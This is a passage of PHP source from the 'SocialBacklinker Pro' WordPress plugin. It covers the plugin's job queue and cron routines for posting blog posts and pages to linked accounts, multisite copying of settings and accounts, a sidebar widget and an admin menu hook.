				if(jQuery(el).hasClass('on'))return false;
				var cls=jQuery(el).attr('rel');
				jQuery(el).parent().find('strong').removeClass('on');
				jQuery(el).parent().find('textarea').hide();
				jQuery(el).addClass('on');
				jQuery(el).parent().parent().find('textarea.'+cls).show();
			}
	</script>
	<?php
}
function t09_sb_postnew($id){
	require_once('func.inc.php');
	$sb=new t09_sb();
	if($sb->opts['include_posts']!=='1')return;
	global $wpdb;
	$table=$wpdb->prefix."t09_sb";
	$sql="SELECT pageid FROM $table WHERE field='post_all' AND data='1'";
	$a=$wpdb->get_results($sql,ARRAY_A);
	for($i=0;$i<count($a);$i++){
		$fields=$sb->get_account($a[$i]['pageid']);
		$fn=$sb->function_prefix.t09_sb_ff($fields['type']);
		//if(function_exists($fn)&&$fields['post_start']<time())$fn($id,$fields,$sb);
		if(function_exists($fn)&&$fields['post_start']<time())t09_sb_createjob('new',$id,$fields,$a[$i]['pageid'],$sb);
	}
}
function t09_sb_postnewpage($id){
	require_once('func.inc.php');
	$sb=new t09_sb();
	if($sb->opts['include_pages']!=='1')return;

	global $wpdb;
	$table=$wpdb->prefix."t09_sb";
	$sql="SELECT pageid FROM $table WHERE field='post_all' AND data='1'";
	$a=$wpdb->get_results($sql,ARRAY_A);
	for($i=0;$i<count($a);$i++){
		$fields=$sb->get_account($a[$i]['pageid']);
		$fn=$sb->function_prefix.t09_sb_ff($fields['type']);
		//if(function_exists($fn)&&$fields['post_start']<time())$fn($id,$fields,$sb);
		if(function_exists($fn)&&$fields['post_start']<time())t09_sb_createjob('new',$id,$fields,$a[$i]['pageid'],$sb);
	}
}
function t09_sb_createjob($method='new',$postid,$account,$accountid,$sb){
	@unlink('working');
	foreach($sb->sites as $k=>$v){
		foreach($v as $type=>$mod){
			if(t09_sb_f($type)==$account['type']){
				$field=array_shift(array_keys($mod['fields']));
				$str=$postid.':'.$method.':'.$account['type'].':'.$field.':'.$account[$field];
				break;
			}
		}
	}
	if(!strlen($str))return;
	// id | unique string | done
	//  0 | postid:new:amplify blog:email:sbdummy | accountid | 0

	$jobs=$posted=$sb->db->prefix."t09_sb_jobs";
	$sql="INSERT INTO $jobs(string,accountid) VALUES('$str',$accountid)";
	if($sb->db->query($sql)) return true;
	return false;
}
function t09_sb_runjob($sb){
	// select job
	if(is_file('working'))return;
	@touch('working');
	$jobs=$sb->db->prefix."t09_sb_jobs";
	$sql="SELECT id,string,accountid FROM $jobs WHERE done=0 LIMIT 0,1";
	$job=$sb->db->get_results($sql,ARRAY_A);
	if(count($job)){
		// 0. Disable job
		$sql="UPDATE $jobs SET done=1 WHERE id={$job[0]['id']}";
		$sb->db->query($sql);

		list($post,$method,$type,$field,$account)=explode(':',$job[0]['string']);

		// 1. Get settings
		$fields=$sb->get_account($job[0]['accountid']);
		$fn=$sb->function_prefix.t09_sb_ff($fields['type']);
		if(function_exists($fn)){

			// 2. Run
			$fn($post,$fields,$sb);

			// 3. Log
			$url=$sb->profile_url($fields);
			$t=implode(':',$url);
			$acc=array_shift($fields);
			$sb->sblog($url['url'],"Posting to {$url['title']}",1);

			// 4. Ping
			if($sb->opts['ping']&&method_exists($sb,'ping'))$sb->pingomatic($url);

		}else{
			$sb->sblog(null,"$string/$fn/{$fields['type']}",1);
		}
	}
	@unlink('working');
	return;
}
function t09_sb_cron(){
	// get all posters
	if(!is_single())return;
	require_once('func.inc.php');
	$sb=new t09_sb();

	// Accounts
	$sqlacc="SELECT pageid FROM $sb->table WHERE field='post_random' AND data='1' GROUP BY pageid";
	$a=$sb->db->get_results($sqlacc,ARRAY_A);

	for($i=0;$i<count($a);$i++){
		$pageid=$a[$i]['pageid'];
		$fields=$sb->get_account($pageid);
		if($fields['post_start']<time()){
			$sb->db->query("UPDATE $sb->table SET `data`='".(time()+($fields['post_frequency']*60))."' WHERE pageid=$pageid AND field='post_start'");
			$r=rand(0,100);
			if($fields['post_chance']>$r){
				$fn=$sb->function_prefix.t09_sb_ff($fields['type']);
				if(function_exists($fn)){
					// Post/pages?
					if($sb->opts['include_pages']==1&&$sb->opts['include_posts']==1){
						$var=(rand(1,2)==1)?'po':'pa';
					}elseif($sb->opts['include_pages']==1){
						$var='pa';
					}elseif($sb->opts['include_posts']==1){
						$var='po';
					}
					// posts
					if($var=='po'){
						$cat=($sb->opts['categories'])?'&cat='.$sb->opts['categories']:'';
						$postopts="post_type=post&showposts=1&post_status=publish&orderby=rand$cat";
					}
					// pages
					if($var=='pa'){
						$postopts="post_type=page&showposts=1&post_status=publish&orderby=rand";
					}
					if($postopts){
						$result = new WP_Query($postopts);
						if($result->post->ID){
							//echo $result->post->ID.$result->post->post_title;
							$id=$result->post->ID;
						}
					}
					/*
					if($sb->opts['include_pages']==1&&$sb->opts['include_posts']==1){
						$sql='SELECT ID FROM '.$sb->db->prefix.'posts WHERE (post_type="post" OR post_type="page") AND post_status="publish" ORDER BY RAND() LIMIT 0,1';
					}elseif($sb->opts['include_pages']==1){
						$sql='SELECT ID FROM '.$sb->db->prefix.'posts WHERE post_type="page" AND post_status="publish" ORDER BY RAND() LIMIT 0,1';
					}elseif($sb->opts['include_posts']==1){
						$sql='SELECT ID FROM '.$sb->db->prefix.'posts WHERE post_type="post" AND post_status="publish" ORDER BY RAND() LIMIT 0,1';
					}
					*/
					if($id){
						//$id=$sb->db->get_var($sql);

						$method=time();
						if($sb->opts['prevent_dupes'])$method='random';
						if(!t09_sb_createjob($method,$id,$fields,$pageid,$sb))$sb->db->query("UPDATE $sb->table SET `data`='".(time()-1)."' WHERE pageid=$pageid AND field='post_start'");
						/*
						$fn($id,$fields,$sb);
						$url=$sb->profile_url($fields);
						$t=implode(':',$url);
						$acc=array_shift($fields);
						//$sb->sblog($url['url'],"Debug: $t:$acc",1);
						$sb->sblog($url['url'],"Posting to {$url['title']}",1);
						if($sb->opts['ping']&&method_exists($sb,'ping'))$sb->ping($fields);
						*/
					}
				}
			}
		}else{
			//echo "{$fields['post_start']}:".time().":{$fields['type']}<br/>";
		}
	}
	// Fuzz
	if(method_exists($sb,'fuzz')&&$sb->opts['fuzzenabled']==1&&$sb->opts['nextfuzz']<time()){
		//echo 'fuzz';
		$_POST['opts']['nextfuzz']=time()+($sb->opts['fuzzmins']*60);
		$sb->fuzz();
		if($sb->opts['ping']&&method_exists($sb,'ping'))$sb->ping($fields);
		$sb->set_opts();
	}elseif(method_exists($sb,'rss')&&$sb->opts['rssenabled']==1&&$sb->opts['feedlist']&&$sb->opts['nextrss']<time()){
		//echo "rss={$sb->opts['nextrss']};nextrss=".time()+($sb->opts['rssmins']*60)."";
		$_POST['opts']['nextrss']=time()+($sb->opts['rssmins']*60);
		$sb->rss();
		if($sb->opts['ping']&&method_exists($sb,'ping'))$sb->ping($fields);
		$sb->set_opts();
	}else{
		t09_sb_runjob($sb);
	}
}
function t09_sb_sitelist(){
	// returns array
	// [siteid]=>(iscurrent)?1:0
	global $wpdb;
	$table=preg_replace('/[0-9]+_$/','',$wpdb->prefix).'blogs';
	$sites=$wpdb->get_results("SELECT blog_id,path FROM $table ORDER BY blog_id ASC",ARRAY_A);
	return($sites);
}
function t09_sb_multiupdate(){
	@set_time_limit(0);
	if($_POST['global_settings']||$_POST['global_accounts']){
		global $wpdb,$blog_id;
		$prefix=preg_replace('/[0-9]+_$/','',$wpdb->prefix);
		$srctbl=($blog_id!=1)?$table=$prefix.$blog_id.'_t09_sb':$prefix.'t09_sb';
		// Settings
		if($_POST['global_settings']){
			$optionsites=0;
			foreach($_POST['applytosite'] as $k=>$v){
				$dsttbl=($k!=1)?$dsttbl=$prefix.$k.'_t09_sb':$prefix.'t09_sb';
				// Sanity check
				$dstlog=$dsttbl.'_log';
				$dstjobs=$dsttbl.'_jobs';
				t09_sb_install($dsttbl,$dstlog,$dstjobs);

				// Update opts
				$sql="DELETE FROM $dsttbl WHERE pageid=0;";
				$wpdb->query($sql);
				$sql="INSERT INTO $dsttbl (SELECT pageid,field,data FROM $srctbl WHERE pageid=0)";
				$wpdb->query($sql);
				$optionsites++;
			}
			$msg.='Updated options for '.$optionsites.(($optionsites>1)?' sites':' site').'.';
		}
		if($_POST['global_accounts']){
			$accountsites=0;
			foreach($_POST['applytosite'] as $k=>$v){
				unset($sites);
				unset($newsites_a);
				unset($newsites_b);
				$dsttbl=($k!=1)?$dsttbl=$prefix.$k.'_t09_sb':$prefix.'t09_sb';
				// Sanity check
				$dstlog=$dsttbl.'_log';
				$dstjobs=$dsttbl.'_jobs';
				t09_sb_install($dsttbl,$dstlog,$dstjobs);

				// Accounts
				if($_POST['accounts_method']=='replace'){
					// Delete everything
					$sql="DELETE FROM $dsttbl WHERE pageid>0;";
					$wpdb->query($sql);
				}
				// Add accounts
				$nextid=t09_sb_next_id($dsttbl);
				$sites=$wpdb->get_results("SELECT pageid,field,`data` FROM $srctbl WHERE pageid>0 ORDER BY pageid ASC",ARRAY_A);
				for($i=0;$i<count($sites);$i++)(array)$newsites_a[$sites[$i]['pageid']][]=$sites[$i];
				if(count($newsites_a)){
					foreach($newsites_a as $k=>$v){(array)$newsites_b[$nextid]=$v;$nextid++;}
					if(is_array($newsites_b)){
						foreach($newsites_b as $k=>$v){
							if(is_array($v)){
								foreach($v as $key=>$val){
									$sql="INSERT INTO $dsttbl(pageid,field,`data`)VALUES($k,'".
										mysql_real_escape_string($val['field'])."','".
										mysql_real_escape_string($val['data'])."')";
									//echo $sql."\n\n<br/>";
									$wpdb->query($sql);
								}
							}
						}
					}
				}
				$accountsites++;
			}
			if($msg)$msg.='<br/>';
			$msg.='Updated accounts for '.$accountsites.(($accountsites>1)?' sites':' site').'.';
		}
		if($msg){
			global $t09sbmsg;
			$t09sbmsg=$msg;
		}
	}else{
		return;
	}
}
function t09_sb_next_id($table){
	global $wpdb;
	$sql="SELECT pageid+1 FROM $table ORDER BY pageid DESC LIMIT 0,1";
	$next=$wpdb->get_var($sql);
	return $next+0;
}

class t09_sb_widget extends WP_Widget{
	function t09_sb_widget(){parent::WP_Widget(false,$name='Social Backlinker');}
	function widget($args,$instance){
		extract($args);
		$title=apply_filters('widget_title', $instance['title']);
		echo $before_widget;
		if($title)echo $before_title.$title.$after_title;
		require_once('func.inc.php');
		$sb=new t09_sb();
		global $wpdb;
		$table=$wpdb->prefix."t09_sb";
		$sql="SELECT pageid FROM $table WHERE field='show_on_widget' AND data='1'";
		$a=$wpdb->get_results($sql,ARRAY_A);
		if(count($a)){
			echo '<ul>';
			for($i=0;$i<count($a);$i++){
				$fields=$sb->get_account($a[$i]['pageid']);
				$fn=$sb->function_prefix.t09_sb_ff($fields['type']).'_widget';
				if(function_exists($fn))$fn($id,$fields,$sb);
			}
			echo '</ul>';
		}
		echo $after_widget;
    }
	function update($new_instance,$old_instance){
		$instance=$old_instance;
		$instance['title']=strip_tags($new_instance['title']);
		return $instance;
	}
	function form($instance){
		$title=esc_attr($instance['title']);
		?>
		<p><label for="<?php echo $this->get_field_id('title'); ?>"><?php _e('Title:'); ?> <input class="widefat" id="<?php echo $this->get_field_id('title'); ?>" name="<?php echo $this->get_field_name('title'); ?>" type="text" value="<?php echo $title; ?>" /></label></p>
		<?php
	}
}
function t09_sb_f($str){$find = array('/[^a-z0-9_]+/si');$str=preg_replace($find,'-',strtolower($str));$str=preg_replace('/^-|-$/','',$str);return $str;}
function t09_sb_ff($str){return str_replace('-','',t09_sb_f($str));}
function t09_sb_sh($s){return preg_replace(array('@<[\/\!]*?[^<>]*?>@si','@([\r\n])[\s]+@'),array('','','\1'),$s);return $s;}


// Admin
function t09_sb_pro_addtoadmin(){add_options_page('SocialBacklinker Pro', 'SocialBacklinker Pro', 8, __FILE__, 't09_sb_pro_admin');}
// Add to admin menu
if (function_exists('add_action')) {
	add_action('admin_menu', 't09_sb_pro_addtoadmin');
}

?>